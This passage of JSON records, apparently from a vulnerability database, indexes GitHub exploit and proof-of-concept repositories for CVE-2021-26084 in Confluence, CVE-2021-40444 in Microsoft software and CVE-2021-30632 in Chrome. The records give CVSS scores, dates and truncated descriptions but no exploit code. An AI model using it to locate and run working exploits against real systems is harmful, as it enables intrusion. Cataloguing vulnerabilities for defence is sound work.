"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-11T11:54:31", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "69FAE88E-7F22-5ACC-B555-3441BE00C566", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T20:18:53", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "CC614155-FD7D-599B-B89C-006B26D76F48", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:01", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-06T17:29:36", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:25:08", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-13T21:41:32", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-28T14:14:00", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-28T11:31:02", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:45:32", "description": "# CVE-2021-26084\n# confluence\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cRCE\n\n## Code By:Jun_sheng @\u6a58\u5b50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T03:07:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-02T13:22:29", "id": "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-11T11:54:27", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-08-06T07:52:51", "description": "# ConfluCHECK\nPython 3 script to identify CVE-2021-26084 via net...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-23T19:45:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-24T19:02:52", "id": "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-28T23:12:46", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-28T15:15:48", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:57:27", "description": "# PoC-CVE-2021-30632\nPoC CVE-2021-30632 - Out of bounds write in...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-20T09:49:51", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2022-03-18T01:28:00", "id": "5BC9FD05-BCBB-5B7C-AE22-BE3732D2976B", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:24:55", "description": "# CVE-2021-26084\n\n- An OGNL injection vulnerability exists that ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-16T03:56:14", "id": "4A995433-D0C6-5BF7-9A78-962229397A7D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:24:16", "description": "# CVE-2021-26084 patch \n\n CVE-2021-26084 patch provided by \"Co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-08T17:05:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-08T17:29:07", "id": "84D5F04A-0DDB-5788-8759-DA99D303B756", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:49:37", "description": "# CVE-2021-26084_PoC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-18T07:33:24", "type": "githubexploit", "title": "Exploit for Injection in 